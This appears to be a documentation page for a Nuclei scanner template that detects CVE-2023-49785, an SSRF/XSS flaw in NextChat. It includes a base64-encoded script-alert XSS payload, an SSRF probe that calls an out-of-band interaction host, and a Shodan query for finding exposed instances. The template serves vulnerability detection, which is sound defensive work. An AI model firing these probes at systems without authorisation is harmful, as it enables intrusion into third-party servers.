ChatGPT-Next-Web - SSRF/XSS
ID: CVE-2023-49785
Severity: critical
Author: high
Tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
Description
Section titled “Description”Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
YAML Source
Section titled “YAML Source”id: CVE-2023-49785
info: name: ChatGPT-Next-Web - SSRF/XSS author: high severity: critical description: | Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web remediation: | Do not expose to the Internet reference: - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/ - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-49785 cwe-id: CWE-79 epss-score: 0.00049 epss-percentile: 0.17861 metadata: verified: true max-request: 2 shodan-query: "title:NextChat,\"ChatGPT Next Web\"" tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
http: - method: GET path: - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23" - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"
matchers-condition: or matchers: - type: dsl dsl: - contains(body_1, "<script>alert(document.domain)</script>") - contains(header_1, "text/html") condition: and
- type: dsl dsl: - contains(header_2,'X-Interactsh-Version') - contains(interactsh_protocol_2,'dns') condition: and# digest: 4a0a0047304502201181295309108be09c1c8fc72b88ba1af64fb6c12a7589bca81000db6b3fabca0221009cafdc8db527c90c3925bceb03e0c741f6d137a2c059467e285a992e18933539:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-49785.yaml"